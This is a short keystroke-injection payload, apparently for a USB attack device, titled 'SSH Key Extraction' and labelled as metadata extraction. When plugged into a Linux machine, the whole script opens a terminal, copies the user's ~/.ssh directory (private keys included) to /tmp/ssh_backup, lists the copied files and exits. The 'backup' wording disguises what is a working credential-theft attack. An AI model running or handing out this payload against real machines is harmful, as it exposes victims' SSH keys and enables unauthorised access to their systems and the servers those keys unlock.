REM =====================================================
REM Title: SSH Key Extraction
REM Author: yogeshjoga
REM Target: Linux (All distributions)
REM Category: Metadata Extraction
REM Description: Copies SSH keys to accessible location
REM =====================================================

DELAY 1000
CTRL-ALT t
DELAY 1000
STRING cp -r ~/.ssh /tmp/ssh_backup 2>/dev/null && echo "SSH keys backed up" || echo "No SSH keys found"
ENTER
DELAY 1000
STRING ls -la /tmp/ssh_backup
ENTER
DELAY 2000
STRING exit
ENTER
